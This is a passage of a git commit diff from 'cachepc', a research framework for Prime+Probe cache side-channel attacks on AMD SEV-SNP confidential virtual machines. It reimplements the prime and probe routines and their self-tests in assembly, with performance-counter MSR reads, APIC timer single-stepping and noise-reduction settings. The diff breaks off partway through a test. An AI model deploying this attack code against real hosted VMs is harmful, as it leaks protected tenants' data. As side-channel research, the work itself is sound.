Reimplement test and prime+probe in asm, make self-tests harder and improve noise - cachepc - Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines

	cachepc Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
	git clone https://git.sinitax.com/sinitax/cachepc
	Log \| Files \| Refs \| Submodules \| README \| sfeed.txt

commit 769e05dd63ed0379e7325da6e82c0c46c151ef4e
parent 0257ca8ac931775fffd74150b439eb9ddcc025aa
Author: Louis Burda <quent.burda@gmail.com>
Date:   Sat, 21 Jan 2023 02:23:52 +0100

Reimplement test and prime+probe in asm, make self-tests harder and improve noise

Diffstat:
M Makefile  | 8 +++++---
M README  | 6 +++++-
M cachepc/asm.S  | 152 ++++++++++++++++++++++++++++++++++++++++++++++++++++++-------------------------
D cachepc/asm.h  | 66 ------------------------------------------------------------------
M cachepc/cachepc.c  | 109 +++++++++++++++++++++++++++++++------------------------------------------------
M cachepc/cachepc.h  | 161 ++++++-------------------------------------------------------------------------
M cachepc/const.h  | 5 ++++-
M cachepc/kvm.c  | 157 +++++++++++++++++++++++++++++++------------------------------------------------
A cachepc/macro.S  | 66 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
M test/eviction.c  | 14 ++++----------
M test/kvm-eviction.c  | 11 +++++++++--
M test/kvm-eviction_guest.S  | 2 +-
M test/kvm.c  | 221 ++++++++++++++++++++-----------------------------------------------------------
M test/kvm.h  | 2 +-

14 files changed, 369 insertions(+), 611 deletions(-)
diff --git a/Makefile b/Makefile
@@ -49,12 +49,14 @@ load:
 	sudo insmod $(LINUX)/arch/x86/kvm/kvm.ko
 	sudo insmod $(LINUX)/arch/x86/kvm/kvm-amd.ko
 
-freq:
+prep:
+	sudo sh -c "echo 0 > /proc/sys/kernel/watchdog"
 	sudo cpupower frequency-set -f 3.7GHz
 
 util/%: util/%.c $(CACHEPC_UAPI)
 
-test/%: test/%.c $(CACHEPC_UAPI)
+test/eviction: test/eviction.c test/util.c $(CACHEPC_UAPI)
+	$(CC) -o $@ $(filter %.c,$^) $(filter %.S,$^) $(CFLAGS)
 
 test/kvm-eviction: test/kvm-eviction.c test/kvm-eviction_guest.S test/util.c \
 		test/util.h test/kvm.c test/kvm.h test/kvm-eviction.h $(CACHEPC_UAPI)
@@ -64,4 +66,4 @@ test/kvm-step: test/kvm-step.c test/kvm-step_guest.S \
 		test/util.c test/util.h test/kvm.c test/kvm.h $(CACHEPC_UAPI)
 	$(CC) -o $@  $(filter %.c,$^) $(filter %.S,$^) $(CFLAGS)
 
-.PHONY: all clean host build load freq
+.PHONY: all clean host build load prep
diff --git a/README b/README
@@ -54,9 +54,12 @@ setup
 Testing was done on a Supermicro H12SSL-i V1.01 motherboard and AMD EPYC 72F3
 (Family 0x19, Model 0x01) cpu.
 
-The following BIOS settings differ from the defaults:
+The following non-default BIOS settings were used:
 
 Advanced > CPU Configuration > Local APIC Mode = xAPIC
+Advanced > CPU Configuration > Core Performance Boost = Disabled
+Advanced > CPU Configuration > SMT Control = Disabled
+Advanced > CPU Configuration > Global C-state Control = Disabled
 Advanced > CPU Configuration > L1 Stream HW Prefetcher = Disabled
 Advanced > CPU Configuration > L2 Stream HW Prefetcher = Disabled
 Advanced > CPU Configuration > SMEE = Enabled
@@ -76,6 +79,7 @@ kvm_amd.sev=1 kvm_amd.sev_es=1 nokaslr debug systemd.log_level=info
 To successfully build and load the kvm.ko and kvm-amd.ko modules, ensure
 that a host kernel debian package was built using `make host`.
 
+
 Because of bad decisions made in regards to version control, the checked
 out commit of the modified kernel (previously the kernel patch file) might
 be incorrect for older revisions.
diff --git a/cachepc/asm.S b/cachepc/asm.S
@@ -1,65 +1,121 @@
-.global stream_hwpf_test
+#include "macro.S"
 
-stream_hwpf_test:
+.global cachepc_read_pmc
+.global cachepc_prime_probe_test_asm
+.global cachepc_stream_hwpf_test_asm
+.global cachepc_single_eviction_test_asm
+
+cachepc_read_pmc:
+    push %rbx
+    push %rcx
+    push %rdx
+    push %r8
+
+    readpmc %rdi %r8
+    mov %r8, %rax
+
+    pop %r8
+    pop %rdx
+    pop %rcx
+    pop %rbx
+
+    ret
+
+cachepc_prime_probe_test_asm:
+    push %rbx
+    push %rcx
+    push %rdx
+    push %r8
+    push %r9
+    push %r10
+    push %r11
+    push %r12
+
+    wbinvd
+
+    mov cachepc_ds, %r9
+    prime prime_probe_test %r9 %r10 %r8
+    mov cachepc_ds, %r9
+    prime prime_probe_test1 %r9 %r10 %r8
+    mov cachepc_ds, %r9
+    prime prime_probe_test2 %r9 %r10 %r8
+    probe prime_probe_test %r8 %r9 %r10 %r11 %r12
+
+    pop %r12
+    pop %r11
+    pop %r10
+    pop %r9
+    pop %r8
+    pop %rdx
+    pop %rcx
+    pop %rbx
+
+    ret
+
+cachepc_stream_hwpf_test_asm:
     push %rbx
     push %rcx
     push %rdx
+    push %r8
+    push %r9
+
+    wbinvd
+
+    readpmc $CPC_L1MISS_PMC %r8
+
+    mov 0x000(%rdi), %rax
+    mov 0x040(%rdi), %rax
+    mov 0x080(%rdi), %rax
+    mov 0x0c0(%rdi), %rax
+    mov 0x100(%rdi), %rax
+    mov 0x140(%rdi), %rax
+    mov 0x180(%rdi), %rax
+    mov 0x1c0(%rdi), %rax
+    mov 0x200(%rdi), %rax
+    mov 0x240(%rdi), %rax
+
+    readpmc $CPC_L1MISS_PMC %r9
+
+    mov %r9, %rax
+    sub %r8, %rax
+
+    pop %r9
+    pop %r8
+    pop %rdx
+    pop %rcx
+    pop %rbx
+
+    ret
+
+cachepc_single_eviction_test_asm:
+    push %rbx
+    push %rcx
+    push %rdx
+    push %r8
+    push %r9
     push %r10
     push %r11
+    push %r12
 
     wbinvd
 
-    mfence
-    mov $0x80000005,%eax
-    cpuid
-
-    mov $0, %rax
-    mov $0, %rdx
-    mov $0xc0010201,%rcx
-    rdmsr
-    shl $32, %rdx
-    or %rax, %rdx
-
-    mov %rdx, %r10
-
-    mfence
-    mov $0x80000005,%eax
-    cpuid
-
-    # mov 0x00(%rdi), %rax
-    # mov 0x48(%rdi), %rax
-    # mov 0x20(%rdi), %rax
-    # mov 0x38(%rdi), %rax
-    # mov 0x18(%rdi), %rax
-    # mov 0x48(%rdi), %rax
-    # mov 0x50(%rdi), %rax
-    # mov 0x58(%rdi), %rax
-    # mov 0x60(%rdi), %rax
-
-    mfence
-    mov $0x80000005,%eax
-    cpuid
-
-    mov $0, %rax
-    mov $0, %rdx
-    mov $0xc0010201,%rcx
-    rdmsr
-    shl $32, %rdx
-    or %rax, %rdx
-
-    mov %rdx, %r11
-
-    mfence
-    mov $0x80000005,%eax
-    cpuid
-
-    mov %r11, %rax
-    sub %r10, %rax
+    mov cachepc_ds, %r9
+    prime single_eviction_test %r9 %r10 %r8
+    mov cachepc_ds, %r9
+    prime single_eviction_test2 %r9 %r10 %r8
+    mov cachepc_ds, %r9
+    prime single_eviction_test3 %r9 %r10 %r8
+    mov (%rdi), %rax
+    probe single_eviction_test %r8 %r9 %r10 %r11 %r12
 
+    pop %r12
     pop %r11
     pop %r10
+    pop %r9
+    pop %r8
     pop %rdx
     pop %rcx
     pop %rbx
 
     ret
+
diff --git a/cachepc/asm.h b/cachepc/asm.h
@@ -1,66 +0,0 @@
-#pragma once
-
-#include <linux/kernel.h>
-
-#define CPUID_AFFECTED_REGS "rax", "rbx", "rcx", "rdx"
-
-__attribute__((always_inline))
-static inline void cachepc_cpuid(void);
-
-__attribute__((always_inline))
-static inline void cachepc_lfence(void);
-
-__attribute__((always_inline))
-static inline void cachepc_sfence(void);
-
-__attribute__((always_inline))
-static inline void cachepc_mfence(void);
-
-__attribute__((always_inline))
-static inline void cachepc_readq(void *p);
-
-void
-cachepc_cpuid(void)
-{
-	asm volatile(
-		"mov $0x80000005, %%eax\n\t"
-		"cpuid\n\t"
-		::: CPUID_AFFECTED_REGS
-	);
-}
-
-void
-cachepc_lfence(void)
-{
-	asm volatile(
-		"lfence\n\t"
-		::: "memory"
-	);
-}
-
-void
-cachepc_sfence(void)
-{
-	asm volatile(
-		"sfence\n\t"
-		::: "memory"
-	);
-}
-
-void
-cachepc_mfence(void)
-{
-	asm volatile(
-		"mfence\n\t"
-		::: "memory"
-	);
-}
-
-void
-cachepc_readq(void *p)
-{
-	asm volatile (
-		"movq (%0), %%r10\n\t"
-		: : "r" (p) : "r10"
-	);
-}
diff --git a/cachepc/cachepc.c b/cachepc/cachepc.c
@@ -4,7 +4,7 @@
 #include "../../include/asm/processor.h"
 
 #include <linux/kernel.h>
-#include <linux/types.h> 
+#include <linux/types.h>
 #include <linux/slab.h>
 #include <linux/delay.h>
 #include <linux/ioctl.h>
@@ -39,10 +39,7 @@ cachepc_verify_topology(void)
 			"virtual memory access will hit corresponding "
 			"physical cacheline, PAGE_SIZE != L1_SETS * L1_LINESIZE");
 
-
-	/* REF: https://developer.amd.com/resources/developer-guides-manuals
-	 * (PPR 17H 31H, P.81) */
-
+	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.94 */
 	val = native_cpuid_ecx(0x80000005);
 	size = ((val >> 24) & 0xFF) * 1024;
 	assoc = (val >> 16) & 0xFF;
@@ -50,8 +47,8 @@ cachepc_verify_topology(void)
 	sets = size / (linesize * assoc);
 	if (size != L1_SIZE || assoc != L1_ASSOC
 			|| linesize != L1_LINESIZE || sets != L1_SETS) {
-			CPC_ERR("L1 topology is invalid!\n");
-			CPC_ERR("L1_SIZE (expected) %u vs. (real) %u\n",
+		CPC_ERR("L1 topology is invalid!\n");
+		CPC_ERR("L1_SIZE (expected) %u vs. (real) %u\n",
 			L1_SIZE, size);
 		CPC_ERR("L1_ASSOC (expected) %u vs. (real) %u\n",
 			L1_ASSOC, assoc);
@@ -62,6 +59,7 @@ cachepc_verify_topology(void)
 		return true;
 	}
 
+	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.94 */
 	val = native_cpuid_ecx(0x80000006);
 	size = ((val >> 16) & 0xFFFF) * 1024;
 	assoc = (val >> 12) & 0xF;
@@ -121,25 +119,23 @@ void
 cachepc_write_msr(uint64_t addr, uint64_t clear_bits, uint64_t set_bits)
 {
 	uint64_t val, newval;
-	uint32_t lo, hi;
 
-	asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(addr));
-	val = (uint64_t) lo | ((uint64_t) hi << 32);
+	val = __rdmsr(addr);
 	val &= ~clear_bits;
 	val |= set_bits;
-	asm volatile ("wrmsr" : : "c"(addr), "a"(val), "d"(0x00));
+	native_wrmsrl(addr, val);
 
-	asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(addr));
-	newval = (uint64_t) lo | ((uint64_t) hi << 32);
-	if (val != newval)
-		CPC_ERR("Write MSR failed at addr %08llX\n", addr);
+	newval = __rdmsr(addr);
+	if (val != newval) {
+		CPC_ERR("Write MSR at %08llX failed (%08llx vs %08llx)\n",
+			addr, val, newval);
+	}
 }
 
 void
 cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask,
 	uint8_t host_guest, uint8_t kernel_user)
 {
-	uint64_t reg_addr;
 	uint64_t event;
 
 	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.166 */
@@ -147,34 +143,27 @@ cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask,
 	WARN_ON(index >= 6);
 	if (index >= 6) return;
 
-	reg_addr = 0xc0010200 + index * 2;
 	event = event_no | (event_mask << 8);
 	event |= (1ULL << 22); /* enable performance counter */
 	event |= ((kernel_user & 0b11) * 1ULL) << 16;
 	event |= ((host_guest & 0b11) * 1ULL) << 40;
 
-	printk(KERN_WARNING "CachePC: Initializing %i. PMC %02X:%02X (%016llx)\n",
-		index, event_no, event_mask, event);
-	asm volatile ("wrmsr" : : "c"(reg_addr), "a"(event), "d"(0x00));
+	// CPC_INFO("Initializing %i. PMC %02X:%02X (%016llx)\n",
+	// 	index, event_no, event_mask, event);
+	cachepc_write_msr(0xc0010200 + index * 2, ~0ULL, event);
 }
 
 void
 cachepc_reset_pmc(uint8_t index)
 {
-	uint64_t reg_addr;
-	uint64_t value;
-
 	WARN_ON(index >= 6);
 	if (index >= 6) return;
 
-	reg_addr = 0xc0010201 + index * 2;
-	value = 0;
-
-	asm volatile ("wrmsr" : : "c"(reg_addr), "a"(value), "d"(0x00));
+	cachepc_write_msr(0xc0010201 + index * 2, ~0ULL, 0);
 }
 
 cache_ctx *
-cachepc_get_ctx(int cache_level)
+cachepc_get_ctx(void)
 {
 	cache_ctx *ctx;
 
@@ -183,7 +172,6 @@ cachepc_get_ctx(int cache_level)
 
 	ctx->sets = L1_SETS;
 	ctx->associativity = L1_ASSOC;
-	ctx->cache_level = cache_level;
 	ctx->nr_of_cachelines = ctx->sets * ctx->associativity;
 	ctx->set_size = L1_LINESIZE * ctx->associativity;
 	ctx->cache_size = ctx->sets * ctx->set_size;
@@ -197,9 +185,7 @@ cachepc_release_ctx(cache_ctx *ctx)
 	kfree(ctx);
 }
 
-/*
- * Initialises the complete cache data structure for the given context
- */
+/* initialises the complete cache data structure for the given context */
 cacheline *
 cachepc_prepare_ds(cache_ctx *ctx)
 {
@@ -261,12 +247,20 @@ cachepc_save_msrmts(cacheline *head)
 			BUG_ON(curr_cl->cache_set >= L1_SETS);
 			WARN_ON(curr_cl->count > L1_ASSOC);
 			cachepc_msrmts[curr_cl->cache_set] = curr_cl->count;
+		} else {
+			BUG_ON(curr_cl->count != 0);
 		}
 
-		curr_cl->count = 0;
 		curr_cl = curr_cl->prev;
 	} while (curr_cl != head);
 
+	if (cachepc_baseline_measure) {
+		for (i = 0; i < L1_SETS; i++) {
+			cachepc_baseline[i] = MIN(cachepc_baseline[i],
+				cachepc_msrmts[i]);
+		}
+	}
+
 	if (cachepc_baseline_active) {
 		for (i = 0; i < L1_SETS; i++) {
 			if (!cachepc_baseline_active)
@@ -292,33 +286,6 @@ cachepc_print_msrmts(cacheline *head)
 	} while (curr_cl != head);
 }
 
-void
-cachepc_update_baseline(void)
-{
-	size_t i;
-
-	for (i = 0; i < L1_SETS; i++) {
-		cachepc_baseline[i] = MIN(cachepc_baseline[i],
-			cachepc_msrmts[i]);
-	}
-}
-
-void __attribute__((optimize(1))) // prevent instruction reordering
-cachepc_prime_vcall(uintptr_t ret, cacheline *cl)
-{
-	if (cachepc_singlestep)
-		cachepc_apic_oneshot(cachepc_apic_timer / CPC_APIC_TIMER_SOFTDIV);
-	cachepc_prime(cl);
-	asm volatile ("mov %0, %%rax; jmp *%%rax" : : "r"(ret) : "rax");
-}
-
-void __attribute__((optimize(1))) // prevent instruction reordering
-cachepc_probe_vcall(uintptr_t ret, cacheline *cl)
-{
-	cachepc_probe(cl);
-	asm volatile ("mov %0, %%rax; jmp *%%rax" : : "r"(ret) : "rax");
-}
-
 cacheline *
 prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len)
 {
@@ -335,8 +302,8 @@ prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len)
 	last_cl_in_sets  = kzalloc(ctx->sets * sizeof(cacheline *), GFP_KERNEL);
 	BUG_ON(last_cl_in_sets == NULL);
 
-	// Find the cache groups that are used, so that we can delete the other ones
-	// later (to avoid memory leaks)
+	/* find the cache groups that are used, so that we can delete the
+	 * other ones later (to avoid memory leaks) */
 	cache_groups_max_len = ctx->sets / CACHE_GROUP_SIZE;
 	cache_groups = kmalloc(cache_groups_max_len * sizeof(uint32_t), GFP_KERNEL);
 	BUG_ON(cache_groups == NULL);
@@ -352,7 +319,8 @@ prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len)
 	to_del_cls = NULL;
 	curr_cl = cache_ds;
 
-	// Extract the partial data structure for the cache sets and ensure correct freeing
+	/* extract the partial data structure for the cache sets and
+	 * ensure correct freeing */
 	do {
 		next_cl = curr_cl->next;
 
@@ -367,7 +335,7 @@ prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len)
 
 	} while (curr_cl != cache_ds);
 
-	// Fix partial cache set ds
+	/* fix partial cache set ds */
 	for (i = 0; i < sets_len; ++i) {
 		last_cl_in_sets[sets[i]]->next = first_cl_in_sets[sets[(i + 1) % sets_len]];
 		first_cl_in_sets[sets[(i + 1) % sets_len]]->prev = last_cl_in_sets[sets[i]];
@@ -423,13 +391,13 @@ build_cache_ds(cache_ctx *ctx, cacheline **cl_ptr_arr) {
 		idx_per_set[cl_ptr_arr[i]->cache_set] += 1;
 	}
 
-	// Build doubly linked list for every set
+	/* build doubly linked list for every set */
 	for (set = 0; set < ctx->sets; ++set) {
 		set_offset = set * set_len;
 		build_randomized_list_for_cache_set(ctx, cl_ptr_arr_sorted + set_offset);
 	}
 
-	// Relink the sets among each other
+	/* relink the sets among each other */
 	idx_map = kzalloc(ctx->sets * sizeof(uint32_t), GFP_KERNEL);
 	BUG_ON(idx_map == NULL);
 
@@ -552,7 +520,6 @@ gen_random_indices(uint32_t *arr, uint32_t arr_len)
 	random_perm(arr, arr_len);
 }
 
-
 bool
 is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len)
 {
@@ -565,3 +532,11 @@ is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len)
 
 	return false;
 }
+
+void
+cachepc_apic_oneshot(uint32_t interval)
+{
+	native_apic_mem_write(APIC_LVTT, LOCAL_TIMER_VECTOR | APIC_LVT_TIMER_ONESHOT);
+	native_apic_mem_write(APIC_TDCR, APIC_TDR_DIV_1);
+	native_apic_mem_write(APIC_TMICT, interval);
+}
diff --git a/cachepc/cachepc.h b/cachepc/cachepc.h
@@ -1,14 +1,10 @@
 #pragma once
 
-#include "asm.h"
 #include "uapi.h"
 
 #include "../../include/asm/apic.h"
 #include "../../include/asm/irq_vectors.h"
 
-#define L1_CACHE 0
-#define L2_CACHE 1
-
 #define CACHE_GROUP_SIZE (PAGE_SIZE / L1_LINESIZE)
 
 #define CACHEPC_GET_BIT(b, i) (((b) >> (i)) & 1)
@@ -27,9 +23,6 @@
 #define CL_IS_LAST(flags) CACHEPC_GET_BIT(flags, 1)
 #define CL_IS_GROUP_INIT(flags) CACHEPC_GET_BIT(flags, 2)
 
-#define CL_NEXT_OFFSET offsetof(struct cacheline, next)
-#define CL_PREV_OFFSET offsetof(struct cacheline, prev)
-
 #define PMC_KERNEL (1 << 1)
 #define PMC_USER   (1 << 0)
 
@@ -42,14 +35,10 @@
 #define CPC_WARN(...) do { pr_warn("CachePC: " __VA_ARGS__); } while (0)
 #define CPC_ERR(...) do { pr_err("CachePC: " __VA_ARGS__); } while (0)
 
-#define CPC_APIC_TIMER_SOFTDIV 3
-
 typedef struct cacheline cacheline;
 typedef struct cache_ctx cache_ctx;
 
 struct cache_ctx {
-	int cache_level;
-
 	uint32_t sets;
 	uint32_t associativity;
 	uint32_t nr_of_cachelines;
@@ -58,18 +47,15 @@ struct cache_ctx {
 };
 
 struct cacheline {
-	/* Doubly linked cache lines inside same cache set */
 	cacheline *next;
 	cacheline *prev;
+	uint64_t count;
 
 	uint32_t cache_set;
 	uint32_t cache_line;
 	uint32_t flags;
 
-	uint64_t count;
-
-	/* padding to fill cache line */
-	char padding[24];
+	char padding[28];
 };
 
 struct cpc_fault {
@@ -79,19 +65,20 @@ struct cpc_fault {
 	struct list_head list;
 };
 
-static_assert(sizeof(struct cacheline) == L1_LINESIZE,
-	"Bad cache line struct size");
+static_assert(sizeof(struct cacheline) == L1_LINESIZE, "Bad cacheline struct");
 static_assert(CPC_CL_NEXT_OFFSET == offsetof(struct cacheline, next));
 static_assert(CPC_CL_PREV_OFFSET == offsetof(struct cacheline, prev));
+static_assert(CPC_CL_COUNT_OFFSET == offsetof(struct cacheline, count));
 
 bool cachepc_verify_topology(void);
 
 void cachepc_write_msr(uint64_t addr, uint64_t clear_bits, uint64_t set_bits);
+
 void cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask,
 	uint8_t host_guest, uint8_t kernel_user);
 void cachepc_reset_pmc(uint8_t index);
 
-cache_ctx *cachepc_get_ctx(int cache_level);
+cache_ctx *cachepc_get_ctx(void);
 void cachepc_release_ctx(cache_ctx *ctx);
 
 cacheline *cachepc_prepare_ds(cache_ctx *ctx);
@@ -104,28 +91,18 @@ void *cachepc_aligned_alloc(size_t alignment, size_t size);
 
 void cachepc_save_msrmts(cacheline *head);
 void cachepc_print_msrmts(cacheline *head);
-void cachepc_update_baseline(void);
-
-void cachepc_prime_vcall(uintptr_t ret, cacheline *cl);
-void cachepc_probe_vcall(uintptr_t ret, cacheline *cl);
-
-__attribute__((always_inline))
-static inline cacheline *cachepc_prime(cacheline *head);
-
-__attribute__((always_inline))
-static inline cacheline *cachepc_probe(cacheline *head);
 
-__attribute__((always_inline))
-static inline void cachepc_victim(void *p);
+cacheline *cachepc_prime(cacheline *head);
+void cachepc_probe(cacheline *head);
 
-__attribute__((always_inline))
-static inline uint64_t cachepc_read_pmc(uint64_t event);
+uint64_t cachepc_read_pmc(uint64_t event);
 
-__attribute__((always_inline))
-static inline void cachepc_apic_oneshot(uint32_t interval);
+void cachepc_apic_oneshot(uint32_t interval);
 
 extern bool cachepc_debug;
 
+extern struct cacheline *cachepc_victim;
+
 extern uint8_t *cachepc_msrmts;
 extern uint8_t *cachepc_baseline;
 extern bool cachepc_baseline_measure;
@@ -159,117 +136,3 @@ extern cacheline *cachepc_ds;
 
 extern uint64_t cachepc_regs_tmp[16];
 extern uint64_t cachepc_regs_vm[16];
-
-/*
- * Prime phase: fill the target cache (encoded in the size of the data structure)
- * with the prepared data structure, i.e. with attacker data.
- */
-cacheline *
-cachepc_prime(cacheline *head)
-{
-	cacheline *curr_cl, *prev_cl;
-
-	cachepc_mfence();
-	cachepc_cpuid();
-
-	curr_cl = head;
-	do {
-		prev_cl = curr_cl;
-		curr_cl = curr_cl->next;
-	} while (curr_cl != head);
-
-	cachepc_mfence();
-	cachepc_cpuid();
-
-	return prev_cl;
-}
-
-cacheline *
-cachepc_probe(cacheline *start_cl)
-{
-	uint64_t pre, post;
-	cacheline *next_cl;
-	cacheline *curr_cl;
-
-	cachepc_mfence();
-	cachepc_cpuid();
-
-	curr_cl = start_cl;
-
-	do {
-		pre = cachepc_read_pmc(0);
-
-		asm volatile(
-			"mov 8(%[curr_cl]), %%rax \n\t"              // +8
-			"mov 8(%%rax), %%rcx \n\t"                   // +16
-			"mov 8(%%rcx), %%rax \n\t"                   // +24
-			"mov 8(%%rax), %%rcx \n\t"                   // +32
-			"mov 8(%%rcx), %%rax \n\t"                   // +40
-			"mov 8(%%rax), %%rcx \n\t"                   // +48
-			"mov 8(%%rcx), %[curr_cl_out] \n\t"          // +56
-			"mov 8(%[curr_cl_out]), %[next_cl_out] \n\t" // +64
-			: [next_cl_out] "=r" (next_cl),
-			  [curr_cl_out] "=r" (curr_cl)
-			: [curr_cl] "r" (curr_cl)
-			: "rax", "rcx"
-		);
-
-		post = cachepc_read_pmc(0);
-
-		/* works across size boundary */
-		curr_cl->count = post - pre;
-
-		curr_cl = next_cl;
-	} while (__builtin_expect(curr_cl != start_cl, 1));
-
-	next_cl = curr_cl->next;
-
-	cachepc_mfence();
-	cachepc_cpuid();
-
-	return next_cl;
-}
-
-void
-cachepc_victim(void *p)
-{
-	cachepc_mfence();
-	cachepc_cpuid();
-
-	cachepc_readq(p);
-
-	cachepc_mfence();
-	cachepc_cpuid();
-}
-
-uint64_t
-cachepc_read_pmc(uint64_t event)
-{
-	uint32_t lo, hi;
-	uint64_t res;
-
-	cachepc_mfence();
-	cachepc_cpuid();
-
-	event = 0xC0010201 + 2 * event;
-
-	asm volatile (
-		"rdmsr"
-		: "=a" (lo), "=d" (hi)
-		: "c"(event)
-	);
-	res = (((uint64_t) hi) << 32) | (uint64_t) lo;
-
-	cachepc_mfence();
-	cachepc_cpuid();
-
-	return res;
-}
-
-void
-cachepc_apic_oneshot(uint32_t interval)
-{
-	native_apic_mem_write(APIC_LVTT, LOCAL_TIMER_VECTOR | APIC_LVT_TIMER_ONESHOT);
-	native_apic_mem_write(APIC_TDCR, APIC_TDR_DIV_1);
-	native_apic_mem_write(APIC_TMICT, interval);
-}
diff --git a/cachepc/const.h b/cachepc/const.h
@@ -21,4 +21,7 @@
 #define KVM_HC_CPC_VMMCALL_EXIT 0xEE02
 
 #define CPC_CL_NEXT_OFFSET 0
-#define CPC_CL_PREV_OFFSET 0
+#define CPC_CL_PREV_OFFSET 8
+#define CPC_CL_COUNT_OFFSET 16
+
+#define CPC_APIC_TIMER_SOFTDIV 3
diff --git a/cachepc/kvm.c b/cachepc/kvm.c
@@ -16,11 +16,14 @@
 #include <linux/types.h>
 #include <asm/uaccess.h>
 
-#define TEST_REPEAT_MAX 200
+#define TEST_REPEAT_MAX 1000
 
 bool cachepc_debug = false;
 EXPORT_SYMBOL(cachepc_debug);
 
+struct cacheline *cachepc_victim;
+EXPORT_SYMBOL(cachepc_victim);
+
 uint8_t *cachepc_msrmts = NULL;
 EXPORT_SYMBOL(cachepc_msrmts);
 
@@ -95,9 +98,14 @@ EXPORT_SYMBOL(cachepc_event_avail);
 bool cachepc_events_init;
 EXPORT_SYMBOL(cachepc_events_init);
 
-static noinline void cachepc_kvm_prime_probe_test(void);
-static noinline void cachepc_kvm_stream_hwpf_test(void);
-static noinline void cachepc_kvm_single_eviction_test(void *p);
+void cachepc_prime_probe_test_asm(void);
+static noinline void cachepc_prime_probe_test(void);
+
+uint64_t cachepc_stream_hwpf_test_asm(void *lines);
+static noinline void cachepc_stream_hwpf_test(void);
+
+void cachepc_single_eviction_test_asm(void *ptr);
+static noinline void cachepc_single_eviction_test(void *p);
 
 static void cachepc_kvm_system_setup(void);
 
@@ -129,31 +137,21 @@ static int cachepc_kvm_ack_event_ioctl(void __user *arg_user);
 static int cachepc_kvm_req_pause_ioctl(void __user *arg_user);
 
 void
-cachepc_kvm_prime_probe_test(void)
+cachepc_prime_probe_test(void)
 {
-	cacheline *lines;
-	cacheline *cl, *head;
-	uint32_t count;
-	int n;
+	int i, n, count;
 
 	/* l2 data cache hit & miss */
-	cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, PMC_HOST, PMC_KERNEL);
-
-	lines = cachepc_aligned_alloc(PAGE_SIZE, cachepc_ctx->cache_size);
-
-	wbinvd();
+	cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, 0, PMC_KERNEL);
 
 	for (n = 0; n < TEST_REPEAT_MAX; n++) {
-		head = cachepc_prime(cachepc_ds);
-		cachepc_probe(head);
+		memset(cachepc_msrmts, 0, L1_SETS);
+		cachepc_prime_probe_test_asm();
+		cachepc_save_msrmts(cachepc_ds);
 
 		count = 0;
-		cl = head = cachepc_ds;
-		do {
-			if (CL_IS_FIRST(cl->flags))
-				count += cl->count;
-			cl = cl->next;
-		} while (cl != head);
+		for (i = 0; i < L1_SETS; i++)
+			count += cachepc_msrmts[i];
 
 		if (count != 0) {
 			CPC_ERR("Prime-probe %i. test failed (%u vs. %u)\n",
@@ -163,30 +161,25 @@ cachepc_kvm_prime_probe_test(void)
 	}
 
 	if (n == TEST_REPEAT_MAX)
-		CPC_WARN("Prime-probe test ok (%u vs. %u)\n", count, 0);
-
-	kfree(lines);
+		CPC_INFO("Prime-probe test ok (%u vs. %u)\n", count, 0);
 }
 
-uint64_t stream_hwpf_test(void *lines);
-
 void
-cachepc_kvm_stream_hwpf_test(void)
+cachepc_stream_hwpf_test(void)
 {
-	cacheline *lines;
 	const uint32_t max = 10;
+	cacheline *lines;
 	uint32_t count;
 	int n;
 
 	/* l2 data cache hit & miss */
-	cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, PMC_HOST, PMC_KERNEL);
+	cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, 0, PMC_KERNEL);
 
 	lines = cachepc_aligned_alloc(L1_SIZE, L1_SIZE);
 
 	count = 0;
 	for (n = 0; n < TEST_REPEAT_MAX; n++) {
-		count = stream_hwpf_test(lines);
-		//count = cachepc_read_pmc(CPC_L1MISS_PMC);
+		count = cachepc_stream_hwpf_test_asm(lines);
 		if (count != max) {
 			CPC_ERR("HWPF %i. test failed (%u vs. %u)\n",
 				n, count, max);
@@ -201,51 +194,39 @@ cachepc_kvm_stream_hwpf_test(void)
 }
 
 void
-cachepc_kvm_single_eviction_test(void *p)
+cachepc_single_eviction_test(void *p)
 {
-	cacheline *head, *cl, *evicted;
-        cacheline *ptr;
+	cacheline *victim;
 	uint32_t target;
 	uint32_t *arg;
-	int n, count;
+	int n, i, count;
 
 	arg = p;
 
 	/* l2 data cache hit & miss */
-	cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, PMC_HOST, PMC_KERNEL);
+	cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, 0, PMC_KERNEL);
 
 	WARN_ON(arg && *arg >= L1_SETS);
 	if (arg && *arg >= L1_SETS) return;
 	target = arg ? *arg : 48;
 
-	ptr = cachepc_prepare_victim(cachepc_ctx, target);
-
-	wbinvd();
+	victim = cachepc_prepare_victim(cachepc_ctx, target);
 
 	for (n = 0; n < TEST_REPEAT_MAX; n++) {
-		head = cachepc_prime(cachepc_ds);
-		cachepc_victim(ptr);
-		cachepc_probe(head);
+		memset(cachepc_msrmts, 0, L1_SETS);
+		cachepc_single_eviction_test_asm(victim);
+		cachepc_save_msrmts(cachepc_ds);
 
 		count = 0;
-		evicted = NULL;
-		cl = head = cachepc_ds;
-		do {
-			if (CL_IS_FIRST(cl->flags) && cl->count > 0) {
-				evicted = cl;
-				count += cl->count;
-			}
-			cl = cl->next;
-		} while (cl != head);
-
